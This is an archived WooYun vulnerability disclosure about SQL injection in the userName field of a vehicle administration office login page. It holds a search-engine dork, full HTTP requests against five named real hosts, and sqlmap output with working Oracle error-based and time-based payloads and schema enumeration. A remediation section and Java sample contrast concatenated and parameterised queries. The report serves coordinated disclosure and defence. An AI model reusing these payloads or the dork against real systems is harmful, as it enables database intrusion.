
Vulnerability Summary

Defect ID: wooyun-2015-0103441

Title: Generic SQL injection in a vehicle administration office (车管所) system

Vendor: 山东国安信息产业有限责任公司 (Shandong Guoan Information Industry Co., Ltd.)

Author: 路人甲

Submitted: 2015-03-24 14:55

Fixed: 2015-06-25 16:42

Published: 2015-06-25 16:42

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability Details

Disclosure timeline:

2015-03-24: Details sent to the vendor; awaiting vendor action
2015-03-27: Vendor confirmed; details visible to the vendor only
2015-03-30: Details opened to third-party security partners
2015-05-21: Details opened to core white hats and domain experts
2015-05-31: Details opened to regular white hats
2015-06-10: Details opened to trainee white hats
2015-06-25: Details made public

Brief description:

A vehicle administration office (车管所) system contains a generic SQL injection vulnerability.

Detailed description:

Prior report: WooYun: 车管所系统通用SQL注入(影响大量车管所网站) (generic SQL injection in vehicle administration office systems, affecting a large number of such sites)
Search engine dork: inurl:/qsjsrzj/logindw.jsp

[screenshot: 123.jpg]


The username field of the login form (the userName POST parameter of /qsjsrzj/logindw.do) is injectable. Five cases demonstrate the problem. Each request below was saved to a file (d:\post2.txt and so on) and fed to sqlmap with its -r option, restricted to the userName parameter. In every case sqlmap reports the same JSP application, the same Oracle back end and the same application schema user (QSWEBCGS_USER), which is what makes this a defect in the product rather than in any one deployment: error-based injection through Oracle's XMLType parser is confirmed on all five hosts, and time-based blind injection through DBMS_PIPE.RECEIVE_MESSAGE on three of them. Enumerating the current user, current schema and available schemas follows directly.
1.

POST http://www.lcwscgs.com/qsjsrzj/logindw.do HTTP/1.1
Host: www.lcwscgs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.lcwscgs.com/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000gNhVnvi-a9ABsnx9ShnEUQ_:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:15:56] [INFO] parsing HTTP request from 'd:\post2.txt'
[14:15:56] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:15:56] [INFO] resuming back-end DBMS 'oracle'
[14:15:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://www.lcwscgs.com/qsjsrzj/logindw.jsp'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 3308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(100)||CHR(102)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (3308=3308) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(118)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'Bvct'='Bvct&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=1' AND 2882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(121)||CHR(67)||CHR(74),5) AND 'oIGy'='oIGy&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:16:02] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:16:02] [INFO] fetching current user
[14:16:02] [INFO] resumed: QSWEBCGS_USER
current user: 'QSWEBCGS_USER'
[14:16:02] [INFO] fetching current database
[14:16:02] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:15:56] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:16:02] [INFO] fetching database (schema) names
[14:16:02] [INFO] the SQL query used returns 35 entries
available databases [35]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LCZW
[*] MDSYS
[*] NLV_ADMIN
[*] ODM
[*] ODM_MTR


2.

POST http://218.59.228.162/qsjsrzj/logindw.do HTTP/1.1
Host: 218.59.228.162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.59.228.162/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000sN7HMkFUGLQ61Z-E7kvw3Gj:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:16:49] [INFO] parsing HTTP request from 'd:\post3.txt'
[14:16:49] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:16:49] [INFO] resuming back-end DBMS 'oracle'
[14:16:49] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://218.59.228.162/qsjsrzj/logindw.jsp'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 5634=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(114)||CHR(122)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (5634=5634) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(115)||CHR(114)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL) AND 'VcZA'='VcZA&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:16:56] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:16:56] [INFO] fetching current user
[14:16:56] [INFO] resumed: QSWEBCGS_USER
current user: 'QSWEBCGS_USER'
[14:16:56] [INFO] fetching current database
[14:16:56] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:16:56] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:16:56] [INFO] fetching database (schema) names
[14:16:56] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] EXFSYS
[*] GXHPJINING_USER
[*] HPGL_USER
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS


3.

POST http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.do HTTP/1.1
Host: www.dygajj.gov.cn:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000f5VIbvTvlvEVS7AuZTPjR48:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:17:16] [INFO] parsing HTTP request from 'd:\post4.txt'
[14:17:16] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:17:16] [INFO] resuming back-end DBMS 'oracle'
[14:17:16] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.jsp'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 5353=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(104)||CHR(115)||CHR(58)||(SELECT (CASE WHEN (5353=5353) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(101)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL) AND 'xfIk'='xfIk&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:17:17] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:17:17] [INFO] fetching current user
[14:17:17] [INFO] resumed: QSWEBCGS_USER
current user: 'QSWEBCGS_USER'
[14:17:17] [INFO] fetching current database
[14:17:17] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:17:17] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:17:17] [INFO] fetching database (schema) names
[14:17:17] [INFO] the SQL query used returns 28 entries
available databases [28]:
[*] CTXSYS
[*] DRV_ADMIN
[*] HR
[*] MDSYS
[*] None
[*] ODM


4.

POST http://58.59.39.43:9080/qsjsrzj/logindw.do HTTP/1.1
Host: 58.59.39.43:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.59.39.43:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=00009f17zBSkxUTkXtCKT1FV4aO:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:17:41] [INFO] parsing HTTP request from 'd:\post5.txt'
[14:17:41] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:17:41] [INFO] resuming back-end DBMS 'oracle'
[14:17:41] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://58.59.39.43:9080/qsjsrzj/logindw.jsp'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 1290=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (1290=1290) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(105)||CHR(100)||CHR(58)||CHR(62))) FROM DUAL) AND 'GdcV'='GdcV&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=1' AND 2098=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(69)||CHR(87)||CHR(76),5) AND 'fxSY'='fxSY&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:17:47] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:17:47] [INFO] fetching current user
[14:17:47] [INFO] resumed: QSWEBCGS_USER
current user: 'QSWEBCGS_USER'
[14:17:47] [INFO] fetching current database
[14:17:47] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:17:47] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:17:47] [INFO] fetching database (schema) names
[14:17:47] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR


5.

POST http://221.2.145.164:9080/qsjsrzj/logindw.do HTTP/1.1
Host: 221.2.145.164:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://221.2.145.164:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000v5isUqUI1ayO-py6ht_6szG:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:18:18] [INFO] parsing HTTP request from 'd:\post6.txt'
[14:18:18] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:18:18] [INFO] resuming back-end DBMS 'oracle'
[14:18:18] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://221.2.145.164:9080/qsjsrzj/logindw.jsp'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 3558=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(115)||CHR(121)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (3558=3558) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(58)||CHR(62))) FROM DUAL) AND 'NWQa'='NWQa&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=1' AND 8327=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(80)||CHR(68)||CHR(89),5) AND 'PNXw'='PNXw&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:18:28] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:18:28] [INFO] fetching current user
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[14:18:34] current user: 'QSWEBCGS_USER'
[14:18:34] [INFO] fetching current database
[14:18:34] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:18:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:18:34] [INFO] fetching database (schema) names
[14:18:34] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR


Proof of vulnerability:

Demonstrated above (five independent hosts, same application, same injection point).

Remediation:

Filter the parameter. Concretely, stop building the login query from the raw userName string: bind it (and password) as a parameter of a prepared statement so the input is never parsed as SQL, and ship the change in the product itself, since every deployment above runs the same application against the same schema user.
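The defect the sqlmap payloads above exploit is a login handler that splices the userName value into its SQL text, and the remediation is to bind it instead. The Java below is an added illustration written for this page, not code from the vendor's application: the real logindw.do source is not part of the report, so the table and column names (T_USER, USERNAME, PASSWORD), the plaintext password comparison and the method names are all assumptions. It shows the concatenating form beside the bound form, and builds the statement the vulnerable form would send for the report's case-1 time-based probe.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class LoginDao {

    // Assumed table name; the schema behind logindw.do is not in the report.
    private static final String TABLE = "T_USER";

    /** How a vulnerable handler builds the query: raw string concatenation. */
    static String buildVulnerableSql(String userName, String password) {
        return "SELECT * FROM " + TABLE
             + " WHERE USERNAME = '" + userName + "'"
             + " AND PASSWORD = '" + password + "'";
    }

    /**
     * Vulnerable path. A single quote in userName closes the literal and
     * everything after it is parsed as SQL, which is exactly what the
     * "1' AND ... AND 'Bvct'='Bvct" payloads rely on.
     */
    static boolean loginVulnerable(Connection conn, String userName, String password)
            throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(buildVulnerableSql(userName, password))) {
            return rs.next();
        }
    }

    /**
     * Hardened path. The statement text is a constant; the values travel to
     * Oracle as bind variables and are compared as data, never parsed as SQL.
     */
    static boolean loginSafe(Connection conn, String userName, String password)
            throws SQLException {
        String sql = "SELECT 1 FROM " + TABLE + " WHERE USERNAME = ? AND PASSWORD = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, userName);
            ps.setString(2, password);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) {
        // The time-based probe sqlmap reported for case 1, as it appears in the report.
        String probe = "1' AND 2882=DBMS_PIPE.RECEIVE_MESSAGE("
                     + "CHR(68)||CHR(121)||CHR(67)||CHR(74),5) AND 'oIGy'='oIGy";
        // The concatenated statement carries the probe as live SQL: on Oracle the
        // RECEIVE_MESSAGE call waits up to 5 seconds on a pipe nobody writes to,
        // which is the delay sqlmap measures. With loginSafe the same string is
        // only a username that matches no row.
        System.out.println(buildVulnerableSql(probe, "2"));
    }
}
```

Binding removes both channels seen in the report for this parameter, the XMLType error message and the DBMS_PIPE delay. Hiding Oracle error text from responses would only remove the first, and character filtering can be bypassed, which is why "filter the parameter" on its own is not a complete fix; the other form fields (password, dwdh, mm, yhlb, state) deserve the same treatment even though the report only tested userName.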

Copyright notice: when reposting, credit 路人甲@乌云 (WooYun).


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-03-27 16:41

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded through CNCERT to the Shandong branch centre, which will coordinate handling with the organisations operating the sites.

Latest status:

None